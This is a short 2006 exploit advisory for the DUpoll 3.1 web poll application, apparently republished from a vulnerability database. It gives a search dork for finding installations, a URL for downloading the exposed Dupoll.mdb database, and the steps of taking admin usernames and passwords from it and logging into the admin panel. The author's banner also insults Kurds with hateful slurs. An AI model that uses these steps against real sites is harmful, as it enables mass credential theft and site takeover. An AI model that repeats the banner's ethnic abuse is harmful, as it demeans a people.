Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14073
HistoryAug 29, 2006 - 12:00 a.m.

DUpoll 3.1 security bug

2006-08-2900:00:00
vulners.com
18

#############################################################################
#DUpoll 3.1 application
bug
#

              #

#BoZKuRTSeRDaR Ülkücü Milliyetçi Türkçü İnternet
korsanı #

                                         #

#kahrolsun pkk kahrolsun Komünizm fuck kurdish
lamerz #

#

#Discovered by: BoZKuRTSeRDaR
bozkurtserdar[at]bozkurtserdar[dot]com #

                     #

#############################################################################

Vendor URL : DUpoll http://www.duware.com/demos/DUpoll/

Dork/Search for: "Powered by DUpoll"

Exploit :

http://www.target.com/[DUpollpatch]/_private/Dupoll.mdb

database downloading

database users table administratory users and pasword

go dir

http://www.target.com/[DUpollpatch]/admin/default.asp

Security Adivisory | Edithor by BoZKuRTSeRDaR